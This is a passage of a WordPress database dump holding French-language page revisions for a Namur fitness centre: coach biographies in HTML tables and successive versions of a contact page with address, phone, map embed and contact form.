href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Fondateur GLFE consulting\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height:600px\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 19:55:18', '2013-07-03 19:55:18', '', 20, 'http://www.crosstrainingcenter.be/?p=253', 0, 'revision', '', 0),
(255, 1, '2013-07-03 19:56:59', '2013-07-03 19:56:59', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height:290px\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoatch\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height:290px\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height:290px\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Fondateur GLFE consulting\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height:290px\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height:290px\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height:290px\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 19:56:59', '2013-07-03 19:56:59', '', 20, 'http://www.crosstrainingcenter.be/?p=255', 0, 'revision', '', 0),
(254, 1, '2013-07-03 19:55:48', '2013-07-03 19:55:48', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoatch\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Fondateur GLFE consulting\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height:280px\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 19:55:48', '2013-07-03 19:55:48', '', 20, 'http://www.crosstrainingcenter.be/?p=254', 0, 'revision', '', 0),
(258, 1, '2013-07-03 19:06:30', '2013-07-03 19:06:30', '<h1>Prise de RDV :</h1>\r\nPrise de RDV par téléphone : 0485 / 92 . 02 . 12\r\n<h1>Adresse :</h1>\r\nChaussée de Perwez 251\r\n5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a>\r\n<h1>Plan d\'accès :</h1>\r\n&nbsp;\r\n<iframe width=\"425\" height=\"350\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" src=\"http://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;sll=50.483687,4.854333&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;ll=50.483687,4.854333&amp;spn=0.046423,0.112867&amp;t=m&amp;z=14&amp;output=embed\"></iframe><br /><small><a href=\"http://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;sll=50.483687,4.854333&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;ll=50.483687,4.854333&amp;spn=0.046423,0.112867&amp;t=m&amp;z=14&amp;source=embed\" style=\"color:#0000FF;text-align:left\">Agrandir le plan</a></small>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-03 19:06:30', '2013-07-03 19:06:30', '', 9, 'http://www.crosstrainingcenter.be/?p=258', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(259, 1, '2013-07-03 20:26:03', '2013-07-03 20:26:03', '<h1>Prise de RDV :</h1>\r\nPrise de RDV par téléphone : 0485 / 92 . 02 . 12\r\n<h1>Adresse :</h1>\r\nChaussée de Perwez 251\r\n5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a>\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"http://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;sll=50.483687,4.854333&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;ll=50.483687,4.854333&amp;spn=0.046423,0.112867&amp;t=m&amp;z=14&amp;output=embed\" height=\"350\" width=\"425\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"http://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;sll=50.483687,4.854333&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;ll=50.483687,4.854333&amp;spn=0.046423,0.112867&amp;t=m&amp;z=14&amp;source=embed\">Agrandir le plan</a></small>\r\n\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-03 20:26:03', '2013-07-03 20:26:03', '', 9, 'http://www.crosstrainingcenter.be/?p=259', 0, 'revision', '', 0),
(260, 1, '2013-07-03 20:28:57', '2013-07-03 20:28:57', '<h1>Prise de RDV :</h1>\r\nPrise de RDV par téléphone : 0485 / 92 . 02 . 12\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em>\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"http://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;sll=50.483687,4.854333&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;ll=50.483687,4.854333&amp;spn=0.046423,0.112867&amp;t=m&amp;z=14&amp;output=embed\" height=\"350\" width=\"425\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"http://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;sll=50.483687,4.854333&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;ll=50.483687,4.854333&amp;spn=0.046423,0.112867&amp;t=m&amp;z=14&amp;source=embed\">Agrandir le plan</a></small>\r\n\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-03 20:28:57', '2013-07-03 20:28:57', '', 9, 'http://www.crosstrainingcenter.be/?p=260', 0, 'revision', '', 0),
(261, 1, '2013-07-03 20:31:53', '2013-07-03 20:31:53', '<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<h1>Prise de RDV :</h1>\r\nPrise de RDV par téléphone : 0485 / 92 . 02 . 12\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em>\r\n</td>\r\n<td>\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"http://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;sll=50.483687,4.854333&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;ll=50.483687,4.854333&amp;spn=0.046423,0.112867&amp;t=m&amp;z=14&amp;output=embed\" height=\"350\" width=\"425\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"http://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;sll=50.483687,4.854333&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;ll=50.483687,4.854333&amp;spn=0.046423,0.112867&amp;t=m&amp;z=14&amp;source=embed\">Agrandir le plan</a></small></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-03 20:31:53', '2013-07-03 20:31:53', '', 9, 'http://www.crosstrainingcenter.be/?p=261', 0, 'revision', '', 0),
(262, 1, '2013-07-03 20:33:29', '2013-07-03 20:33:29', '<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<h1>Prise de RDV :</h1>\r\nPrise de RDV par téléphone : 0485 / 92 . 02 . 12\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em>\r\n</td>\r\n<td>\r\n<h1>Plan d\'accès :</h1>\r\n<iframe width=\"300\" height=\"300\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;output=embed\"></iframe><br /><small><a href=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;source=embed\" style=\"color:#0000FF;text-align:left\">Agrandir le plan</a></small></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-03 20:33:29', '2013-07-03 20:33:29', '', 9, 'http://www.crosstrainingcenter.be/?p=262', 0, 'revision', '', 0),
(263, 1, '2013-07-03 20:36:24', '2013-07-03 20:36:24', '<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<h1>Prise de RDV :</h1>\r\n0485 / 92 . 02 . 12\r\n\r\nLes prises de RDV pour les séances de Team Training, Duo Training, Personnal Trainer ou Coatching nutritionnel se font exclusivement par téléphone.\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em></td>\r\n<td>\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;source=embed\">Agrandir le plan</a></small></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-03 20:36:24', '2013-07-03 20:36:24', '', 9, 